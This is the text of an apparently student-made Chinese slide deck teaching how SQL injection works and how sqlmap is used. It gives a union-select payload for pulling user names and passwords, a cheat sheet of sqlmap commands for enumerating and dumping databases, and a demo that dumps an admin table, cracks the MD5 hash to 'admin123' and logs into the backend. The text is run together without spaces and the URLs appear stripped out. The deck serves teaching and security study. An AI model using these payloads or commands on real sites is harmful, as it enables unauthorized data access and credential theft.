SQL注入+sqlmap使用

SQL注入与sqlmap使用主讲：裴建民小组成员：喜成斌、朱孝超、裴建民第二小组LOGOContents注入的基本原理1注入类型2sqlmap的基本使用3演示4LOGOSQL注入SQL注入简介拼接的SQL字符串改变了设计者原来的意图，执行了如泄露、改变数据等操作，甚至控制数据库服务器拼接SQL字符串灵活方便，但是容易导致安全问题LOGOSQL注入SQL注入原理=47=47and1=1=47and1=2LOGOSQL注入利用利用示例=47select*fromnewswhereid=$idselect*fromnewswhereid=0unionselectname,pwfromusersLOGOSQL注入分类按数据提交方式postgetcookie按数据库类型最常见的两类：php+mysql、asp+access网址url后面带XXX.php就是apeach服务器，一般和mysql数据库搭配网址url后面带XXX.asp就是iis服务器，一般和access数据库搭配asp+orecal一般用于数据量比较大的网站。LOGOsqlmap使用sqlmap常用命令sqlmap.py-uurl--dbs//爆数据库sqlmap.py-uurl--current-db//爆当前库sqlmap.py-uurl--current-user//爆当前用户sqlmap.py-uurl--users查看用户权限sqlmap.py-uurl--tables-D数据库//爆表段sqlmap.py-uurl--columns-T表段-D数据库//爆字段sqlmap.py-uurl--dump-C字段-T表段-D数据库//猜解sqlmap.py-uurl--dump--start=1--stop=3-C字段-T表段-D数据库//猜解1到3的字段LOGOsqlmap使用sqlmap.py-u=87LOGOsqlmap使用access数据库直接爆表名sqlmap.py-u=87--tablesLOGOsqlmap使用找到管理员表表名,爆列名sqlmap-uSqlmap-u=87--columns-Tadmin_userLOGOsqlmap使用猜解管理员账号密码sqlmap-u=87--dump-Cadmin,password-Tadmin_userLOGOsqlmap使用admind71fd34592b393a1b97ec90b0f80287a破解cmd5后为admin123登录后台使用sqlmap命令参考工具只是辅助，前提是要明白工具的原理